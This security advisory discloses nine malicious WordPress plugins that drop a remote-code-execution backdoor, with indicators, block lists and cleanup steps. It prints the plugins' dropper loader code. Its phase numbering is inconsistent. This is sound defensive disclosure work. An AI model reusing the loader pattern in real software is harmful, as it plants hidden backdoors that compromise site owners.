Audit #48 Malicious Closed by wp.org

9 affected plugins · 80 combined active installs · 9 closed on wp.org · baseline — → head (suite — 9 plugins) · closed 1d ago

Actor: SiteGuarding (SafetyBis Ltd.) — 2024 burner wave

Show full summary

Verdict: malicious — a previously-undocumented 2024 wave of nine SiteGuarding supply-chain burner plugins, each on its own throwaway wp.org account. This is a distinct third operational phase of the SiteGuarding operation, sitting between the 2013–2020 27-plugin portfolio (audit #28) and the 2025–2026 burner wave (audits #25, #26, #42–#47). It was surfaced in June 2026 by a blob-decode code scan across the closed-plugin corpus — the payloads hide in randomly-named .key data files that a PHP-only grep never opens.

Seven of the nine are .key-file droppers: the activation hook runs glob(__DIR__."/*.key"), base64_decodes + gzuncompresses the blob into a struct, and writes its tools member — the SiteGuarding siteguarding_tools.php v1.7 RCE backdoor (the Task_savefile/Task_includefile primitive set, operator IPs 185.72.157.169-172) — into WordPress root under an operator-chosen name. The other two (seo-pack, geo-traffic-control-and-redirect) are larger SEOGuarding-branded suites that ship the same .key dropper plus tell-tale SiteGuarding assets (images/logo_siteguarding.svg, classes/sgAntiBot.php) and call safetybis.com.

Seven of the nine were closed by wp.org on a single day — 2024-12-09 — a coordinated takedown batch (the other two on 2024-07-10 and 2024-09-15), mirroring the 2020 portfolio sweep but, like it, never publicly disclosed. With this wave the known SiteGuarding footprint reaches 44 plugins across ~19 wp.org accounts.

🛑

80 installs across 9 plugins potentially exposed to compromised code.

Site owners should remediate immediately. Plugin author: see the steps below to clear this label.

If you run any of these 9 plugins on your site

See the Affected plugins table below for the full slug list. To check whether any are installed across your fleet:

wp plugin list --field=name | grep -E '^(advanced\-captcha\-for\-contact\-form\-7|antivirus\-solution|avp\-website\-solution|bad\-bot\-blocker|geo\-security\-suit|geo\-traffic\-control\-and\-redirect|wp\-admin\-two\-factor\-authentication|wp\-webdoctor|seo\-pack)$'

For each match, verify your install against the wp.org canonical and remove if compromised:

wp plugin verify-checksums <slug>
wp plugin deactivate <slug>
wp plugin delete <slug>

Patched builds for the major affected slugs are hosted at plugins.captaincore.io — see the cleanup instructions for site operators below for the full per-plugin URL list.

If you're the plugin author

If your site ever activated any of these nine plugins, treat it as having had a backdoor dropped into WordPress root — the plugin's activation hook wrote siteguarding_tools.php (the v1.7 RCE backdoor) into ABSPATH under an operator-chosen name, and that file persists after the plugin is deleted.

Search WordPress root (and webanalyze/) for siteguarding_tools.php and any unexpected PHP file matching the v1.7 backdoor (look for Task_savefile / Task_includefile / the IP list 185.72.157.169-172). Delete it and the webanalyze/ directory.
Delete the plugin directory and any leftover *.key file inside it.
Block outbound traffic to siteguarding.com, *.siteguarding.com, safetybis.com, and cmsplughub.com, plus the IP ranges 185.72.157.0/24 and 198.7.59.0/24.
Audit admin users and rotate WordPress, database, and SFTP/SSH credentials — Task_includefile grants arbitrary PHP execution, so assume full compromise of any site that ran one of these for any length of time.
See the full SiteGuarding remediation checklist in the audit #27 writeup (the IOCs and cleanup steps are identical across all three phases of the operation).

The nine plugins are closed on wordpress.org, so no new installs are possible — but closure does not remove the dropped backdoor from existing sites. Active remediation is required.

The label clears automatically on the next wp beacon scan-deltas once the cleanup conditions above are met.

Affected plugins (9)

All plugins covered by this incident report. Combined exposure: 80 active installs across 9 slugs.

Plugin	Active installs	Trunk version	wp.org status
advanced-captcha-for-contact-form-7	10	1.0	Closed on wp.org
Antivirus Solution	10	2.21	Closed on wp.org
AVP Website Solution	10	1.7.14	Closed on wp.org
Bad Bot Blocker	10	1.6	Closed on wp.org
GEO Security Suite	10	1.4.1	Closed on wp.org
GEO Traffic Control and Redirect	10	2.9.4	Closed on wp.org
WP Admin Two Factor Authentication	10	1.0	Closed on wp.org
WP Webdoctor	10	2.2	Closed on wp.org
SEO Pack	—	1.1	Closed on wp.org

IOCs extracted (3)

Kind	Value	Confidence
code_pattern	`$json['tools']`	medium
code_pattern	`sgAntiBot`	high
filename	`logo_siteguarding.svg`	high

The 2024 SiteGuarding burner wave (audit #48)

Nine plugins, nine throwaway wp.org accounts, all closed by wp.org in 2024 — seven of them on the same day. None appear in the April-2026 news coverage or in the 2020-portfolio takedown; this wave was entirely undocumented until WP Beacon's closed-plugin blob scan (2026-06-15) decoded their .key payloads.

Plugin	Account	Closed	Installs @ closure	Shape
advanced-captcha-for-contact-form-7	`@idengod`	2024-12-09	~10	`.key` dropper → siteguarding_tools.php v1.7
avp-website-solution	`@bowieraymon`	2024-12-09	~10	`.key` dropper → v1.7
bad-bot-blocker	`@browwwny76`	2024-12-09	~10	`.key` dropper → v1.7
wp-admin-two-factor-authentication	`@mich4el1973`	2024-12-09	~10	`.key` dropper → v1.7
wp-webdoctor	`@ckreg00`	2024-12-09	~10	`.key` dropper → v1.7
geo-security-suit	`@antoniomel`	2024-12-09	~10	`.key` dropper → v1.7
antivirus-solution	`@bigjohnnie`	2024-12-09	~10	`.key` dropper → v1.7
geo-traffic-control-and-redirect	`@devander`	2024-09-15	~10	SEOGuarding suite + `.key` dropper
seo-pack	`@seodevteam`	2024-07-10	n/a (never archived)	SEOGuarding suite + `.key` dropper

Every plugin in this wave sat in the "fewer than 10" install bucket at closure (8 of 9 recovered via Wayback; seo-pack was never archived). Reach note: unlike the 2026 wave (wp-advanced-math-captcha at 6,000+), the 2024 burners were uniformly tiny — the operator optimised for breadth and low review-profile, not install volume.

The `.key` delivery mechanism

Each plugin ships a single randomly-named *.key file (e.g. VtD8x.key, rP2UE6Yrl.key, 6jJv74zAQ.key). On activation:

register_activation_hook( __FILE__, 'acfcf7_activation' );
// inside the handler:
foreach ( glob( dirname(__FILE__)."/*.key" ) as $filename ) {
    $json = base64_decode( file_get_contents($filename) );
    $json = gzuncompress( $json );      // -> struct: name, tools, class, update
    ...
    $fp = fopen( ABSPATH.'/'.$json['name'], 'w' );
    fwrite( $fp, $json['tools'] );      // writes siteguarding_tools.php into WP root
    // also writes $json['class'] and (on cron) $json['update']
}

glob("*.key") means the random filename is irrelevant — the loader picks up whatever .key is present. The decoded tools member is siteguarding_tools.php v1.7 (dated 20 Mar 2020) — byte-identical in role to the backdoor dropped by the 2026 burners' plugin.dat/tools.gzs and bundled inline in 15 of the 2020-portfolio plugins. It exposes Task_savefile / Task_showfile / Task_includefile (write+include arbitrary PHP = RCE), gated to operator IPs 185.72.157.169-172 with a PGP fallback, and self-updates from siteguarding.com/ext/panel_api/index.php.

This .key-glob vehicle is a new delivery TTP for the operation — distinct from the inline-bundled file (2020), the .dat/.gzs blobs (2026), and the wp-config.php include-injection (cls-lcp / code-quality, 2026). Same payload, new wrapper.

SEOGuarding-branded suites

seo-pack (rt-seo-* "realtime SEO" lineage) and geo-traffic-control-and-redirect are full plugins rather than thin droppers, and carry unambiguous SiteGuarding fingerprints in cleartext: images/logo_siteguarding.svg, classes/sgAntiBot.php, and safetybis.com calls — the same SEOGuarding sub-brand seen on the original portfolio's realtime-seo. They ship the .key dropper alongside the suite functionality.

Coordinated, undisclosed takedown

Seven of the nine were closed on 2024-12-09 in a single wp.org review action — the same coordinated-batch shape as the May–June 2020 portfolio sweep, and like it, with no public advisory, CVE, or news coverage. The closures carry closed_reason of security-issue (5) and guideline-violation (4); none disclose the backdoor.

Attribution

SiteGuarding. The decoded .key payload is the operator's own siteguarding_tools.php v1.7 backdoor (with its hardcoded operator IPs, PGP key, and siteguarding.com/ext/panel_api self-update); the two suites ship logo_siteguarding.svg + sgAntiBot + safetybis.com. Nine distinct empty-profile burner accounts (idengod, bowieraymon, browwwny76, mich4el1973, ckreg00, antoniomel, bigjohnnie, devander, seodevteam) used once each — the same single-plugin-per-burner pattern as the 2026 wave.

Where this sits in the operation

Phase 1 — 2013–2020 portfolio: 27 plugins under @siteguarding/@sgdevteam, closed May–June 2020 (audit #28).
Phase 3 — 2024 burner wave (this audit): 9 plugins / 9 accounts, closed Jul/Sep/Dec 2024. .key dropper.
Phase 2 — 2025–2026 burner wave: 8 plugins / 8 accounts, closed Oct 2025–Apr 2026 (audits #25, #26, #42–#47). .dat/.gzs droppers, wp-config injection, C2-proxy.

Total known footprint: 44 plugins, ~19 wp.org accounts, one continuously-maintained siteguarding_tools.php codebase (v1.7 → v2.4), C2 on siteguarding.com + safetybis.com + cmsplughub.com.